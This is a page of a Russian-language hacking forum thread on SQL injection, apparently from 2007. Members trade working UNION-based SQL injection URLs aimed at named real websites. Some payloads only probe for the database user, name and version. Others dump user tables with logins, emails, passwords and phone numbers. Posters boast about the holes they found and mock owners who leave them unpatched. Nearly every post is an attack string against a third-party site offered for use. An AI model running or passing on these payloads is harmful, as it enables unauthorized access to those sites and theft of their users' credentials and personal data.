SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 30 of 798
  1. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Ну и я тогда этот скуль напишу :)
    И еще парочку.
     
    #581 kamaz, 25 Feb 2007
    1 person likes this.
  2. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    Code:
    __http://www.vyshop.com/product_detail.php?id=-5+union+select+1,concat(user(),char(58),database(),char(58),version()),333,444,555,6,7,8,9,10,11/*
    Code:
    __http://www.gamesfirst.com/index.php?id=1132'
     
    #582 Thanat0z, 26 Feb 2007
    Last edited: 26 Feb 2007
    1 person likes this.
  3. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://www.gamesfirst.com/index.php?id=-1132+UNION+SELECT+1,count(*),3+from+users/*
    http://www.gamesfirst.com/index.php?id=-1132+UNION+SELECT+null,concat(userid,char(58),username,char(58),password),null+from+users/*

    Когда же по нормальному все научитесь делать чуть какое то отклонение от правил сразу... такие глаза oO )))
     
    #583 guest3297, 26 Feb 2007
    2 people like this.
  4. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    :)
     
    #584 kamaz, 26 Feb 2007
  5. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    уже было, не латают они дыры, а потом жалуются что злобные хакеры коцают их
     
    #585 Thanat0z, 26 Feb 2007
  6. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://www.rsi.ru/news/news.asp?id=2334+or+1=(SELECT+TOP+1+cast(LOGINS+as+nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarchar)%2B%27%3A%27%2Bcast(MAIL+as+nvarchar)+from+RSI_LOGINS+where+Id=1)--
    вот и mssql забацал ;)

    _http://www.eng.wayne.edu/news.php?id=-99+union+select+1,id,3,4,5,6,7,8,9,0,1,2,3+from+users/*
    а вот с названием отстальных колонок проблемы
     
    #586 злюка, 26 Feb 2007
    Last edited: 26 Feb 2007
    3 people like this.
  7. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.duet-service.ru/conf/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.ww-realty.ru/main.php?pg=faq&faqaction=showsubheading&id=-1+union+select+1,2,database(),4,5,6/*
     
    #587 Grey, 26 Feb 2007
    Last edited: 26 Feb 2007
    1 person likes this.
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =\ опять еду
     
    #588 Spyder, 26 Feb 2007
    2 people like this.
  9. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    вот еще одну нашел accessid
     
    #589 }{0TT@БЬ)Ч, 26 Feb 2007
  10. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.kelektro.ru/katalog.phtml?N_KATALOG_TEXT=-1+union+select+1,user(),3,4,5,6,7,8/*

http://www.mikroakustika.ru/cnt1.php?l1=-1+union+select+1,user(),3,4,5,6/*
     
    #590 Grey, 26 Feb 2007
    Last edited: 26 Feb 2007
  11. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    ))
     
    #591 kamaz, 26 Feb 2007
  12. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.5557.ru/price_all.php?el=-1+union+select+1,user(),3,4,5/*

http://www.ural-market.com/auto_desc.php?Type=1&CodeTech=-1+union+select+user(),2,3,database(),5,6,7,8,9,10,11,12/*

http://www.mcmtravel.ru/excursions/mntur.php?type=-1+union+select+1,user(),3,4,5,6,7,8,9,10/*
     
    #592 Grey, 26 Feb 2007
    Last edited: 26 Feb 2007
  13. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://www.entrepreneurship.appstate.edu/news.php?id=-99+union+select+1,user(),3,database(),5,6/*
    ничего не смог вывести
     
    #593 злюка, 27 Feb 2007
    Last edited: 27 Feb 2007
  14. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    таблицы некоторые нашел но ничего интересного в них нету:(
     
    #594 }{0TT@БЬ)Ч, 27 Feb 2007
    Last edited: 27 Feb 2007
  15. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://www.mediacomp.ru/?action=sub_kat&top_kat=-3+union+select+1,2,3/*
     
    #595 }{0TT@БЬ)Ч, 27 Feb 2007
    Last edited: 27 Feb 2007
  16. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://allo-mebel.ru/shop/?dir=59'

    http://boardsearch.ru/index.php?sect_id=1&rubric_id=34'

     
    #596 *D1VER, 27 Feb 2007
    Last edited: 27 Feb 2007
  17. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Code:
    http://allo-mebel.ru/shop/?dir=33-1
http://allo-mebel.ru/shop/?dir=32
    иньекции нету.

    А вот эта понравилась...
    Code:
    http://boardsearch.ru/index.php?sect_id=1&rubric_id=-1+UNION+SELECT+3,2,1/*
http://boardsearch.ru/index.php?sect_id=1&rubric_id=-1+UNION+SELECT+null,999999999999,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71)/*
    хек-хек
    Code:
    http://boardsearch.ru/index.php?sect_id=1&rubric_id=-1+UNION+SELECT+null,999999999999,concat(user_id,char(58),email,char(58),password,char(58),name,char(58),phone)+from+users/*
     
    #597 guest3297, 27 Feb 2007
    1 person likes this.
  18. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    И на старуху бывает проруха.

    Вот на мой взгляд скули тут нету но сломать надо.
    Кто расковыряет постипм сюда, но скули там нету имхо.
     
    #598 guest3297, 27 Feb 2007
  19. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.sobolmarket.ru/index.php?page=-1+union+select+user()/*

http://www.stmaster.ru/price.php?razd=-1+union+select+1,user()/*

http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15/*
     
    #599 Grey, 27 Feb 2007
    Last edited: 27 Feb 2007
    1 person likes this.
  20. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    ))
     
    #600 kamaz, 27 Feb 2007
    3 people like this.
(You must log in or sign up to post here.)
Page 30 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.